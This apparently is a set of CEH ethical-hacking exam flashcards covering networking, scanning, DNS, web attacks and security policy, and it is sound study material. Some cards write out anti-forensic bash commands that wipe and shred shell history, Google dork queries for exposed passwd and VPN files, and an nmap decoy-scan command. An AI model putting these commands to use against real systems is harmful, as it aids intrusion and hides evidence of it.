A security objective that ensures a resource can be accessed only by authorized users. This is also the security principle that stipulates sensitive information is not disclosed to unauthorized individuals, entities, or processes.
A. The attacker took advantage of a zero-day vulnerability on the machine.
A security peer is confused about a recent incident. An attacker successfully accessed a machine in the organization and made off with some sensitive data. A full vulnerability scan was run immediately following the theft, and nothing was discovered. Which of the following best describes what may have happened? A. The attacker took advantage of a zero-day vulnerability on the machine. B. The attacker performed a full rebuild of the machine after he was done. C. The attacker performed a denial-of-service attack. D. Security measures on the device were completely disabled before the attack began.
C. Ensure that any remaining risk is residual or low and accept the risk.
A security team is implementing various security controls across the organization. After several configurations and applications, a final agreed-on set of security controls are put into place; however, not all risks are mitigated by the controls. Of the following, which is the next best step? A. Continue applying controls until all risk is eliminated. B. Ignore any remaining risk as "best effort controlled." C. Ensure that any remaining risk is residual or low and accept the risk. D. Remove all controls.
500
A simple scanning for ISAKMP at UDP port ___ can indicate the presence of a VPN gateway
computer-based attack
A social engineering attack using computer resources such as e-mail and IRC
bug
A software or hardware defect that often results in system vulnerabilities.
Algorithm
A step-by-step method of solving a problem.
cache
A storage buffer that transparently stores data so future requests for the same data can be served faster.
community string
A string used for authentication in SNMP
block cipher
A symmetric key cryptographic algorithm that transforms a block of information at a time using a cryptographic key.
Blowfish
A symmetric, block-cipher data-encryption standard that uses a variable-length key that can range from 32 bits to 448 bits.
C)Location anonymity
A systems administrator reports to you that an attacker used a TOR proxy to carry out an attack against your network. What does this proxy provide to the attacker? A)Payload obscurity B)Packet fragmentation C)Location anonymity D)Overlapping fragments
B. The attacker will see message 2.
A target machine (with a MAC of 12:34:56:AB:CD:EF) is connected to a switch port. An attacker (with a MAC of 78:91:00:ED:BC:A1) is attached to a separate port on the same switch with a packet capture running. There is no spanning of ports or port security in place. Two packets leave the target machine. Message 1 has a destination MAC of E1:22:BA:87:AC:12. Message 2 has a destination MAC of FF:FF:FF:FF:FF:FF. Which of the following statements is true regarding the messages being sent? A. The attacker will see message 1. B. The attacker will see message 2. C. The attacker will see both messages. D. The attacker will see neither message.
A. --script D. -sC
A team member is using nmap and asks about the "scripting engine" in the tool. Which option switches can be used to invoke the nmap scripting engine? (Choose two.) A. --script B. -z C. -sA D. -sC
B. It displays the NetBIOS name cache.
A team member issues the nbtstat.exe -c command. Which of the following best represents the intent of the command? A. It displays the IP route table for the machine. B. It displays the NetBIOS name cache. C. It displays active and inactive services. D. It puts a NIC into promiscuous mode for sniffing.
A)String formatting C)Buffer overflow E)Code injection F)Thread racing
A team of developers is creating mobile apps that target Apple iOS devices. Which of the following vulnerabilities should they address when using Objective-C? (Choose all that apply.) A)String formatting B)Memory corruption C)Buffer overflow D)Log injection E)Code injection F)Thread racing G)Access control H)Type confusion
cookie
A text file stored within a browser by a web server that maintains information about the connection. It is used to store information to maintain a unique but consistent surfing experience but can also contain authentication parameters. It can be encrypted and have a defined expiration date.
B. User input is not sanitized, which can potentially be exploited
A user forgets her password to a website, and the web application asks her to enter her email to have the password emailed to her. She enters her email as [email protected]. The application displays a server error. What is most likely wrong with the web application? A. Nothing. The email is not valid and this is a normal response B. User input is not sanitized, which can potentially be exploited C. The web server installation has poor privilege control D. The application uses a back end database
D) 5 minutes
A user has chosen a 22-character password that is straight out of a dictionary. Approximately how long will it take to crack the password? A) 50 years B) 22 years C) 15 days D) 5 minutes
D. Cross site scripting
A user receives an e-mail with a link to an interesting forum. She clicks the link and is taken to a web based bulletin board; however, additional functions are carried out in the background under her user privileges. The functions allow the attacker access to information used on the BBS, even though no executables are downloaded and run on the user's machine. Which of the following best describes this attack? A. Backdoor B. Trapdoor C. Denial of Service D. Cross site scripting
cryptographic key
A value used to control cryptographic operations, such as decryption, encryption, signature generation, and signature verification.
D) Display pop-ups
A virus does not do which of the following? A) Replicate with user interaction B) Change configuration settings C) Exploit vulnerabilities D) Display pop-ups
boot sector virus
A virus that plants itself in a system's boot sector and infects the master boot record.
B. The password is never sent in clear text over the network
A web administrator chooses Digest authentication over Basic authentication on her website. Why is Digest authentication considered more secure than Basic authentication? A. Basic authentication uses a single factor B. The password is never sent in clear text over the network C. The password is sent in clear text over the network but is never reused D. It uses Kerberos
B. The firewall doesn't protect against port 80 or port 443
A web server sits behind a firewall and offers HTTP and HTTPS access to a website and web applications. External users access the server for various web applications. Which of the following is true regarding the protection offered by the firewall? A. The firewall can detect malicious traffic and will halt attacks B. The firewall doesn't protect against port 80 or port 443 C. If properly configured, a firewall is the only protection needed to safeguard the server D. Authentication methods configured at the firewall can halt most attacks
Access point (AP)
A wireless LAN device that acts as a central point for all wireless traffic.
802.11i
A wireless LAN security standard developed by IEEE. Requires Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard (AES)
A. PTR B. MX D. SOA F. A
A zone file consists of which records? (Choose all that apply.) A. PTR B. MX C. SN D. SOA E. DNS F. A G. AX
-TTL based ACK flag probe scanning or -WINDOW based ACK flag probe scanning
ACK Probe Packets --> <-- RST
Layer 6 Presentation
AFP, NCP, MIME, etc. reside at what layer of the OSI model?
Asia and the Pacific
APNIC manages what areas?
Canada, many Caribbean and North Atlantic islands, and the United States.
ARIN manages what areas?
Layer 2 Data Link
ARP, CDP, PPP, etc. reside at what layer of the OSI model?
D)Create and enforce a physical security policy for remote employees.
Alice frequents coffee shops, libraries, and other public areas where your company's remote employees typically work. Alice knows that the username and password employees use to log in to their laptops are the same credentials used to access the company's virtual private network (VPN). When an employee first arrives and pulls out a laptop, Alice will position herself in a seat behind that employee. When the employee enters the login credentials to unlock the laptop, Alice will look over the employee's shoulder to see the username and which keys are typed for the password. What should the company do to prevent this shoulder surfing attack? A)Purchase and distribute privacy filter screens to remote employees. B)Implement and require full disk encryption for new and existing laptops. C)Apply asset tags with the text "Look over your shoulder!" on new laptops. D)Create and enforce a physical security policy for remote employees.
secretly track
All In One Keylogger allows you to ___ all activities from all computer users and automatically receive logs to a desired email/FTP/LAN account
exploit vulnerabilities
Attackers try various tools and attack techniques to ______ in a computer system or security policy and controls to achieve their motives
A)127.0.0.1
After a recent malware infection, one of the devices in your network is found to be continually changing its LAN connection settings to use itself as a proxy server. It resides in the 192.168.1.0/24 network. Which IP address will be used on the device for the proxy server? A)127.0.0.1 B)255.255.255.255 C)192.168.1.1 D)192.168.1.255
C)Installing a driver
After successfully executing a buffer overflow attack on a Windows machine, which of the following actions is NOT allowed in the security context of the LOCAL_SYSTEM account? A)Spawning a shell B)Changing the time zone C)Installing a driver D)Debugging an application
B) ACK
After the three-way handshake, which flag is set in packets sent in either direction? A) SYN B) ACK C) FIN D) XMAS
www.networksolutions.com www.godaddy.com www.register.com
After you have your IP address number and want to register your name where can you go?
content monitoring services up-to-date information
Alerts are the ____ that provide ____ based on your preference, usually via email or SMS in an automated manner.
D)Allan will be unable to establish an interactive session
Allan has completed the following steps in an attempt to hack a web application: -Obtained a valid session ID token via an XSS vulnerability -Confirmed that the session ID manager validates the source IP address as well -Spoofed the required IP address -Replayed the session ID What will be the result? A)The session ID manager will create a new session ID B)The session ID manager will determine the address is spoofed C)Allan will be able to establish an interactive session D)Allan will be unable to establish an interactive session
InSpy
Attackers use the ___ utility, which performs enumeration on LinkedIn and finds people based on job title, company, or email address
A. DNSRV1.anycomp.com, 3600 seconds
An SOA record gathered from a zone transfer is shown here: @ IN SOA DNSRV1.anycomp.com. postmaster.anycomp.com. ( 4 ; serial number 3600 ; refresh [1h] 600 ; retry [10m] 86400 ; expire [1d] 3600 ) ; min TTL [1h] What is the name of the authoritative DNS server for the domain, and how often will secondary servers check in for updates? A. DNSRV1.anycomp.com, 3600 seconds B. DNSRV1.anycomp.com, 600 seconds C. DNSRV1.anycomp.com, 4 seconds D. postmaster.anycomp.com, 600 seconds
B. The administrator is configuring IP masquerading.
An administrator enters the following command on a Linux system: iptables -t nat -L Which of the following best describes the intent of the command entered? A. The administrator is attempting a port scan. B. The administrator is configuring IP masquerading. C. The administrator is preparing to flood a switch. D. The administrator is preparing a DoS attack.
B)tcpd
An administrator has configured SMTP and HTTP services running on a FreeBSD server. She wants to allow standard email and web traffic across registered ports 25, 80, and 443. However, any unauthorized access should be logged and denied. Which daemon should you use for logging and simple access control? A)smtpd B)tcpd C)httpd D)asmtpd
antivirus (AV) software
An application that monitors a computer or network to identify, and prevent, malware. ___ is usually signature-based and can take multiple actions on defined malware files/activity.
Zero-Day Attack
An attack that exploits computer application vulnerabilities before the software developer releases a patch for the vulnerability
Operating system (OS) attack
An attack that exploits the common mistake many people make when installing operating systems--that is, accepting and leaving all the defaults.
Active attack
An attack that is direct in nature -- usually where the attacker injects something into, or otherwise alters, the network or system target.
cross-site scripting (XSS)
An attack whereby the hacker injects code into an otherwise legitimate web page, which is then clicked by other users or is exploited via Java or some other script method. The embedded code within the link is submitted as part of the client's web request and can execute on the user's computer.
exploit the applications
An attacker can ___ with the setuid or setgid flags to execute malicious code with elevated privileges
B)FQDNs of all intermediary devices
An attacker is using the traceroute tool to carry out network footprinting. Which of the following may NOT be discovered using this tool? A)Structure of the network B)FQDNs of all intermediary devices C)IP addresses of routers and firewalls D)IP addresses of internal computers
Track company's online reputation Collect company's search engine ranking information Obtain email notifications when a company is mentioned online Track conversations Obtain social news about the target organization
An attacker makes use of ORM tracking tools to:
B)Decreases the packet send frequency of the scan
An attacker recently used Nmap to SYN scan your network. You discover that he adjusted the timing options of the scan, thereby avoiding detection by your network intrusion detection system (IDS). How does adjusting the timing options affect the Nmap scan? A)Identifies the operating systems being used on the network B)Decreases the packet send frequency of the scan C)Generates scanning decoys on the network D)Determines which network hosts are not available
A. The HTML file has permissions of read only
An attacker successfully executes a buffer overflow against an IIS web server. He spawns an interactive shell with plans to deface the main web page. An attempt to use the echo command to overwrite index.html does not work, and an attempt to delete the page altogether also fails. Additionally, an attempt to copy a new page in its place also fails. What is the probable cause of the attacker's problem? A. The HTML file has permissions of read only B. A buffer overflow attack cannot deface a web page C. The LOCAL_SYSTEM privilege level is insufficient for the attempts D. The server is using Kerberos authentication
B)Network sniffer
An attacker wants to be able to implement a man-in-the-middle (MITM) attack to capture authentication tokens used on a corporate network. Which type of tool would he use? A)Port scanner B)Network sniffer C)Penetration tester D)Vulnerability scanner
black hat
An attacker who breaks into computer systems with malicious intent, without the owner's knowledge or permission.
D)HR department
An employee has been found to be in direct violation of the company's security policy. When you inform him of the policy, he claims to know nothing about it. You need to find out if he was made aware of the security policy. Which entity should be able to confirm this? A)IT department B)Legal department C)Upper management D)HR department
Banner grabbing
An enumeration technique used to provide information about a computer system; generally used for operating system identification (also known as fingerprinting).
Annualized rate of occurrence (ARO)
An estimate of the number of times during a year a particular asset would be lost or experience downtime.
A. The port is filtered at the firewall.
An ethical hacker is ACK-scanning against a network segment he knows is sitting behind a stateful firewall. If a scan packet receives no response, what does that indicate? A. The port is filtered at the firewall. B. The port is not filtered at the firewall. C. The firewall allows the packet, but the device has the port closed. D. It is impossible to determine any port status from this response.
A. A white hat is attempting a black-box test
An ethical hacker is given no prior knowledge of the network and has a specific framework in which to work. The agreement specifies boundaries, nondisclosure agreements, and a completion date definition. Which of the following statements is true? A. A white hat is attempting a black-box test. B. A white hat is attempting a white-box test. C. A black hat is attempting a black-box test. D. A black hat is attempting a gray-box test.
ike-scan
Attackers can probe further using a tool such as ___ to enumerate the sensitive information including encryption and hashing algorithm, authentication type, key distribution algorithm, SA LifeDuration, etc.
A. A white hat is attempting a black-box test.
An ethical hacker is hired to test the security of a business network. The CEH is given no prior knowledge of the network and has a specific framework in which to work, defining boundaries, nondisclosure agreements, and the completion date. Which of the following is a true statement? A. A white hat is attempting a black-box test. B. A white hat is attempting a white-box test. C. A black hat is attempting a black-box test. D. A black hat is attempting a gray-box test.
C. Stealth
An ethical hacker is sending TCP packets to a machine with the SYN flag set. None of the SYN/ACK responses on open ports is being answered. Which type of port scan is this? A. Ping sweep B. XMAS C. Stealth D. Full
Source routing
An ethical hacker sends a packet with a deliberate and specific path to its destination. What technique is the hacker using?
C. Split DNS
An organization has a DNS server located in the DMZ and other DNS servers located on the intranet. What is this implementation commonly called? A. Dynamic DNS B. DNSSEC C. Split DNS D. Auto DNS
C) Core Impact D) CANVAS
An organization wants to save time and money and decides to go with an automated approach to pen testing. Which of the following tools would work for this? (Choose two) A) Nmap B) Netcat C) Core Impact D) CANVAS
business impact analysis (BIA)
An organized process to gauge the potential effects of an interruption to critical business operations as a result of disaster, accident, or emergency.
Data Encryption Standard (DES)
An outdated symmetric cipher encryption algorithm, previously U.S. government-approved and used by business and civilian government agencies. It is no longer considered secure because of the ease with which the entire keyspace can be attempted using modern computing, thus making cracking the encryption easy.
asset
Any item of value or worth to an organization, whether physical or virtual.
Improper data/input validation Authentication and Authorization attacks Security misconfiguration Information disclosure Broken session management Buffer overflow issues Cryptography attacks SQL injection Improper error handling and exception management
Application Threats
weaknesses and misconfigurations
Applications include many ___ like unquoted paths, path environment variable misconfiguration, and search order hijacking that lead to path interception
Link local
Applies only to hosts on the same subnet
UDP Scanning
Are you open on UDP Port 29 --> <-- No response if port is open or <-- If port is closed, an ICMP Port Unreachable message is received
fragmented packets
Attackers can use Colasoft Packet Builder to create ____ to bypass firewalls and IDS systems in a network
encode malicious content
Attackers can use DNS tunneling to ___ or data of other programs within DNS queries and replies
B. ICMP is being filtered.
As a pen test on a major international business moves along, a colleague discovers an IIS server and a mail exchange server on a DMZ subnet. You review a ping sweep accomplished earlier in the day on that subnet and note neither machine responded to the ping. What is the most likely reason for the lack of response? A. The hosts might be turned off or disconnected. B. ICMP is being filtered. C. The destination network might be down. D. The servers are Linux based and do not respond to ping requests.
B. Passive
As a pen test team member, you begin searching for IP ranges owned by the target organization and discover their network range. You also read job postings and news articles and visit the organization's website. Throughout the first week of the test, you also observe when employees come to and leave work, and you rummage through the trash outside the building for useful information. Which type of footprinting are you accomplishing? A. Active B. Passive C. Reconnaissance D. None of the above
B)Creates a binary log file in a specific folder.
As a security professional for your company, you must perform routine network analysis. Today you must perform a traffic capture using tcpdump. You run the tcpdump -w /log command. What does this command do? A)Captures the packets from a particular host. B)Creates a binary log file in a specific folder. C)Reads packets from a specific folder. D)Captures the packets on a specific interface.
B. Privacy Act
As part of a pen test on a U.S. government system, you discover files containing Social Security numbers and other sensitive personally identifiable information (PII) information. You are asked about controls placed on the dissemination of this information. Which of the following acts should you check? A. FISMA B. Privacy Act C. PATRIOT Act D. Freedom of Information Act
B)Network administrator issues RFID cards for the server room and reviews the door logs
As part of a security audit, your team is looking for common security design issues. In which scenario would applying the segregation of duties principle enhance security? A)IT techs have passwords of 5 characters, while users have passwords of 12 characters B)Network administrator issues RFID cards for the server room and reviews the door logs C)Sales group both creates marketing materials and edits the materials D)User is allowed to install his own software and attach hardware to his computer
A. Gray box
As part of the preparation phase for a pen test you are participating in, the client relays their intent to discover security flaws and possible remediation. They seem particularly concerned about internal threats from the user base. Which of the following best describes the test type the client is looking for? A. Gray box B. Black box C. White hat D. Black hat
C)Active port scanning on 10.1.1.119
As part of your job duties, you must regularly review the log files for several servers on your network. Recently while reviewing the log files for a server with the IP address of 10.1.1.119, you see the following events: Time: Dec 28 02:12:48 Port: 20 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02:12:54 Port: 21 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02:13:01 Port: 22 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02:13:07 Port: 23 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02:13:15 Port: 25 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02:13:21 Port: 80 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02:13:24 Port: 110 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Which activity occurred according to these entries? A)Active port scanning on 10.1.1.26 B)DoS attack against 10.1.1.26 C)Active port scanning on 10.1.1.119 D)DoS attack against 10.1.1.119
router
As the packet travels through the nodes in the network, each ___ examines the destination IP address and chooses the next hop to direct the packet to the destination
C)www.netcraft.com
As your company's ethical hacker, you often perform routine penetration tests to check the security for your company's network. Last week, an attacker posted details obtained through operating system fingerprinting about your company's servers. You need to perform the same type of check to verify what information is available. Which tool should you use? A)www.webextractor.com B)www.changedetection.com C)www.netcraft.com D)www.whois.com
Encrypted HTTPS protocol to send exploits to the Web server
As your company's security practitioner, you are responsible for overall network security, which includes an IDS and a firewall. In addition, you must ensure that the company's Web server is protected. Your company's Web server has been the target of an advanced persistent threat (APT). The IDS log files do not show any intrusion attempts, but the Web server constantly locks up and requires constant rebooting. After the latest incident, you review the firewall logs and notice a large number of SSL request packets. You decide to implement the following security measures: Install a proxy server and terminate SSL at the proxy Install a hardware SSL accelerator and terminate SSL at that layer. What is the best description of the attack vector? A)Encrypted HTTPS protocol to send exploits to the Web server B)Encrypted IPSec protocol to send exploits to the firewall C)Encrypted IPSec protocol to send exploits to the Web server D)Encrypted HTTPS protocol to send exploits to the firewall
Confidentiality
Assurance that the information is accessible only to those authorized to have access
Availability
Assurance that the systems responsible for delivering, storing, and processing information are accessible when required by the authorized users
Network (Layer 3)
At which layer of the OSI model do packet filtering firewalls operate?
Application (Layer 7)
At which layer of the OSI model do proxy servers operate?
Application layer (Layer 7)
At which layer of the OSI model does a cross-site scripting attack occur?
determine key hosts in the network
Attackers can gather DNS information to _____ and can perform social engineering attacks.
exfiltrate stolen confidential
Attackers can make use of this back channel to ___ or sensitive information from the server using DNS tunneling
spoofed tokens
Attackers can obtain access tokens of other users or generate ___ to escalate privileges and perform malicious activities by evading detection
cat /dev/null > ~/.bash_history && history -c && exit
BASH Clearing the user's complete history
export HISTSIZE=0
BASH Disabling history
shred ~/.bash_history (Shreds the history file, making its content unreadable) shred ~/.bash_history && cat /dev/null > ~/.bash_history && history -c && exit (Shreds the history file and clears the evidence of the command)
BASH Shredding the history
disaster recovery plan (DRP)
BCPs include a ___ that addresses exactly what to do to recover any lost data or services.
1) Inform employees about what you collect, why, and what you will do with it 2) Keep employees' personal information accurate, complete, and up-to-date 3) Limit the collection of information and collect it by fair and lawful means 4) Provide employees access to their personal information 5) Inform employees about the potential collection, use, and disclosure of personal information 6) Keep employees' personal information secure
Basic Rules for Privacy Policies at Workplace
integrity
Bit flipping is one form of an ___ attack.
- Check for Live Systems - Check for Open Ports - Scanning Beyond IDS - Banner Grabbing - Scan for Vulnerability - Draw Network Diagrams - Prepare Proxies - Scanning Pen Testing
CEH Scanning Methodology
Information Systems Audit and Control Association (ISACA) and IT Governance Institute (ITGI)
COBIT (Control Objectives for Information and Related Technology) was created by what?
Planning and organization Acquisition and implementation Delivery and support Monitoring and evaluation
COBIT categorizes control objectives into what domains?
No
Can you complete the three-way handshake and open a successful TCP connection with spoofed IP addresses?
Sniffing the network traffic
Capturing and analyzing packets from the target enables an attacker to determine the OS used by the remote system
Tails
Censorship Circumvention Tool
C) ARP poisoning
Certain switches provide several security features. What would enabling DHCP snooping help to prevent? A) MAC flooding B) DNS flooding C) ARP poisoning D) DNS poisoning
B. The host is most likely a printer or has a printer installed.
Consider the ports shown in the nmap output returned on an IP scanned during footprinting: PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 01:2A:48:0B:AA:81 Which of the following is true regarding the output? A. The host is most likely a router or has routing enabled. B. The host is most likely a printer or has a printer installed. C. The host is definitely a Windows Server. D. The host is definitely a Linux Server.
White hats
Considered the good guys, these are the ethical hackers, hired by a customer for the specific goal of testing and improving security or for other defensive purposes. Need prior consent. Also known as security analysts.
corrective controls
Controls internal to a system designed to resolve vulnerabilities and errors soon after they arise.
CCleaner DBAN Privacy Eraser Wipe BleachBit ClearProg
Covering Tracks Tools
plists
Daemons have ___ that are linked to executables that run at start up
Source Port -- Destination Port Sequence Number Acknowledgment Number Offset - Reserved - Flags - Window Checksum Options - Padding Data
Describe the TCP segment structure
SYN Sequence #105 <----------- SYN/ACK (Your) Sequence #106 (My) Sequence #223 ---------------> ACK (Your) Sequence #224 (My) Sequence #106
Describe the three-way handshake.
StegoStick StegJ Office XML SNOW Data Stash Hydan
Document Steganography Tools
authenticity
Digital signatures can be used to guarantee the ___ of the person sending a message.
Attacker --> Target: Sending packet with spoofed 10.0.0.5 IP, TTL 13. Target --> Real IP: Sending a packet to the real 10.0.0.5 IP. Real IP --> Target: Reply from real 10.0.0.5 IP, TTL 25
Direct TTL Probe flow
site:domain or web page string example: site:anywhere.com passwds
Displays pages for a specific website or domain holding the search term.
index of/string example: "intitle:index of" passwd
Displays pages with directory browsing enabled, usually used with another operator.
inurl:string example: inurl:passwd example: allinurl: etc passwd
Displays pages with the string in the URL.
live machines port port status OS details device type system uptime
During the Scanning Phase what type of information can be extracted?
C)Results of past audits as examples of previous work
During the presentation of bids for penetration testing work, which of the following additions to a proposal would be unethical to submit? A)Suggestions of testing formats that worked in the past B)Letters of recommendation from former customers C)Results of past audits as examples of previous work D)Time estimates based on previous experience
A)Assign read-only permission to all HTML files and folders for the www-data group
During vulnerability assessment, you rank the public-facing website as an integral asset to the company's continued reputation and revenue. But there are several potential threats to the Apache HTTP Server that hosts the website. The static webpages in particular could be vulnerable to defacement. Which security control should you implement? A)Assign read-only permission to all HTML files and folders for the www-data group B)Assign write permissions to the web root for only the www-data group C)Assign write-only permission to all HTML files and folders for the www-data group D)Assign read and write permissions to the web root for only the www-data group
A)Pre-Attack
During which phase of security testing is a non-disclosure agreement (NDA) executed? A)Pre-Attack B)Attack C)Post Attack D)Recon
-By default, LDAP traffic is transmitted unsecured; use SSL or STARTTLS technology to encrypt the traffic -Select a user name different from your email address and enable account lockout
Enumeration Countermeasures for LDAP
-Disable SMB protocol on Web and DNS Servers -Disable SMB protocol on Internet facing servers -Disable ports TCP 139 and TCP 445 used by the SMB protocol -Restrict anonymous access through RestrictNullSessAccess parameter from the Windows Registry
Enumeration Countermeasures for SMB
Configure SMTP servers to: -Ignore email messages to unknown recipients -Not to include sensitive mail server and local host information in mail responses -Disable open relay feature -Limit the number of accepted connections from a source in order to prevent brute force attacks
Enumeration Countermeasures for SMTP
ICMP Type 3 Code 10
Error message - Host administratively prohibited
ICMP Type 3 Code 7
Error message - Host unknown
ICMP Type 3 Code 9
Error message - Network administratively prohibited
ICMP Type 3 Code 6
Error message - Network unknown
Banner grabbing from error messages
Error messages provide information such as type of server, type of OS, and SSL tool used by the target remote system
verify the existence of exploitable vulnerabilities
Ethical hacking focuses on simulating techniques used by attackers to _____ in the system security
identify vulnerabilities
Ethical hacking involves the use of hacking tools, tricks, and techniques to ______ so as to ensure system security
B. The capture shows step 2 of a TCP handshake.
Examine the Snort output shown here: 08/28-12:23:13.014491 01:10:BB:17:E3:C5 -> A5:12:B7:55:57:AB type: 0x800 len: 0x3C 190.168.5.12:33541 -> 213.132.44.56:23 TCP TTL:128 TOS: 0x0 ID:12365 IpLen:20 DgmLen:48 DF ***A**S* Seq: 0xA153BD Ack: 0xA01657 Win: 0x2000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOPSackOK 0x000: 00 02 B3 87 84 25 00 10 5A 01 0D 5B 08 00 45 00 .%..Z..[..E. 0x0010: 00 30 98 43 40 00 80 06 DE EC C0 A8 01 04 C0 A8 .0.C@... 0x0020: 01 43 04 DC 01 BB 00 A1 8B BD 00 00 00 00 70 02 .C....p. 0x0030: 20 00 4C 92 00 00 02 04 05 B4 01 01 04 02 .L..... Which of the following is true regarding the packet capture? A. The capture indicates a NOP sled attack. B. The capture shows step 2 of a TCP handshake. C. The packet source is 213.132.44.56. D. The packet capture shows an SSH session attempt.
A. One hour
Examine the following SOA record: @ IN SOARDNSRV1.somebiz.com. postmaster.somebiz.com. ( 200408097 ; serial number 3600 ; refresh [1h] 600 ; retry [10m] 86400 ; expire [1d] 7200 ) ; min TTL [2h] How long will the secondary server wait before asking for an update to the zone file? A. One hour B. Two hours C. Ten minutes D. One day
B. This rule will alert on packets coming from outside the designated home address. D. This rule will alert on packets designated on port 23, from any port, containing the "admin" string.
Examine the following Snort rule: alert tcp !$HOME_NET any -> $HOME_NET 23 (content: "admin"; msg: "Telnet attempt..admin access";) Which of the following are true regarding the rule? (Choose all that apply.) A. This rule will alert on packets coming from the designated home network. B. This rule will alert on packets coming from outside the designated home address. C. This rule will alert on packets designated for any port, from port 23, containing the "admin" string. D. This rule will alert on packets designated on port 23, from any port, containing the "admin" string.
A. The operator is enumerating a system named someserver.
Examine the following command sequence: C:\> nslookup Default Server: ns1.anybiz.com Address: 188.87.99.6 > set type=HINFO > someserver Server: resolver.anybiz.com Address: 188.87.100.5 Someserver.anybiz.com CPU=Intel Quad Chip OS=Linux 2.8 Which of the following best describes the intent of the command sequence? A. The operator is enumerating a system named someserver. B. The operator is attempting DNS poisoning. C. The operator is attempting a zone transfer. D. The operator is attempting to find a name server.
B. Nslookup is in interactive mode. C. The output will show all mail servers in the zone somewhere.com.
Examine the following command-line entry: C:\>nslookup Default Server: ns1.somewhere.com Address: 128.189.72.5 > set q=mx > mailhost Which statements are true regarding this command sequence? (Choose two.) A. Nslookup is in non-interactive mode. B. Nslookup is in interactive mode. C. The output will show all mail servers in the zone somewhere.com. D. The output will show all name servers in the zone somewhere.com
Comments in the source code Contact details of web developer or admin File system structure Script type
Examining HTML source provides what kind of information?
Access Control Policy Remote-Access Policy Firewall-Management Policy Network-Connection Policy Passwords Policy User-Account Policy Information-Protection Policy Special-Access Policy Email Security Policy Acceptable-Use Policy
Examples of Security Policies
Facial images Fingerprints Handwriting samples
Examples of biometrics
filetype:rcf inurl:vpn
Finds SonicWall Global VPN Client files containing sensitive information and logins
filetype:pcf vpn OR Group
Finds publicly accessible profile configuration files (.pcf) used by VPN clients
SYN sequence number
First, a session must be established between the two systems. To do this, the sender forwards a segment with the ___ flag set, indicating a desire to synchronize a communications session. This segment also contains a ____ -- a pseudo-random number that helps maintain the legitimacy and uniqueness of this session.
- Restrict employees from accessing social networking sites from the organization's network - Configure web servers to avoid information leakage - Educate employees to use pseudonyms on blogs, groups, and forums - Do not reveal critical information in press releases, annual reports, product catalogues, etc. - Limit the amount of information that you publish on the website/Internet - Use footprinting techniques to discover and remove any sensitive information that is publicly available - Prevent search engines from caching a web page and use anonymous registration services
Footprinting Countermeasures
- Enforce security policies to regulate the information that employees can reveal to third parties - Separate internal and external DNS or use split DNS, and restrict zone transfers to authorized servers - Disable directory listings on the web servers - Educate employees about various social engineering tricks and risks - Opt for privacy services on the Whois Lookup database - Avoid domain-level cross-linking for the critical assets - Encrypt and password-protect sensitive information
Footprinting Countermeasures (cont'd)
Maltego Recon-ng FOCA Prefix Whois Netmask NetScanTools Pro Binging Tctrace SearchBug Autonomous System Scanner (ASS) TinEye DNS-Digger Robtex Dig Web Interface SpiderFoot White Pages NSlookup Email Tracking Tool Zaba Search yoName GeoTrace Ping-Probe DomainHostingView MetaGoofil GMapCatcher Wikto SearchDiggity SiteDigger Google HACK DB Google Hacks Gooscan BiLE Suite Trellian
Footprinting Tools
pen testing
Footprinting ____ is used to determine an organization's publicly available information
security posture
Footprinting allows attackers to know the ___ of the target organization
Facebook Linkedin Twitter Google+ Pinterest
Gather target organization employees' information from their personal profiles on social networking sites such as ____, etc., which assists in performing social engineering
Market value of a company's shares Company profile Competitor details
Gathering Information from Financial Services provides what kinds of information?
nmap -D RND:10 [target]
Generates a random number of decoys using Nmap
A. SYN, SYN/ACK, ACK
Given the following Wireshark filter, what is the attacker attempting to view? ((tcp.flags == 0x02) || (tcp.flags == 0x12)) || ((tcp.flags == 0x10) && (tcp.ack==1) && (tcp.len==0)) A. SYN, SYN/ACK, ACK B. SYN, FIN, URG, and PSH C. ACK, ACK, SYN, URG D. SYN/ACK only
A)Generate a banner that describes what service is running on port 443 if it is open
Given this command: telnet 192.168.5.5 443 What will it do? A)Generate a banner that describes what service is running on port 443 if it is open B)Close all open Telnet sessions in 4 minutes and 43 seconds C)Open a Telnet session with the device at 192.168.5.5 in 4 minutes and 43 seconds D)Test the Telnet connection every 443 seconds and send an alert if it doesn't answer
TCP/UDP 3268
Global Catalog Service
hidden storage
GrayFish is a Windows kernel rootkit that runs inside the Windows operating system and provides an effective mechanism, ___, and malicious command execution while remaining invisible
Non-Repudiation
Guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message
modifying system application features
Hacking involves ___ or ___ to achieve a goal outside of the creator's original purpose
-Open Local Group Policy Editor and navigate to Local Computer Policy --> Computer Configuration --> Administrative Templates --> Network --> DNS Client -In DNS client, double-click on Turn off multicast name resolution -Select the Disabled radio button and then click OK
How do you disable LLMNR
-Open Control Panel and navigate to Network and Internet --> Network and Sharing Center and click on Change adapter settings option present on the right side -Right-click on the network adapter and click Properties, select TCP/IPv4 and then click Properties -Under General tab, go to Advanced --> WINS -From the NetBIOS options, check "Disable NetBIOS over TCP/IP" radio button and click OK
How do you disable NBT-NS
1) Connect to the SOA 2) Enter nslookup at the command line. 3) Type server <IPAddress>, using the IP address of the SOA. Press ENTER. 4) Type ls -d domainname.com, where domainname.com is the name of the zone, and then press ENTER.
How do you do a zone transfer with nslookup?
Open the snort.config file and comment out all of the rules you do not wish to use
How do you prevent rule files from loading when snort is started?
1) nslookup 2) server servername
How do you switch to your target's server using nslookup?
Uses a word list based on variations of dictionary words to discover the password
How does a hybrid password attack work? A)Uses different known factors about the user, such as date of birth, license number, and other personally identifiable information (PII) to discover the password B)Uses every possible combination of letters, numbers, and special characters to discover the password C)Uses a word list based on variations of dictionary words to discover the password D)Uses a dictionary input list to discover the password
B)Hides message with whitespace
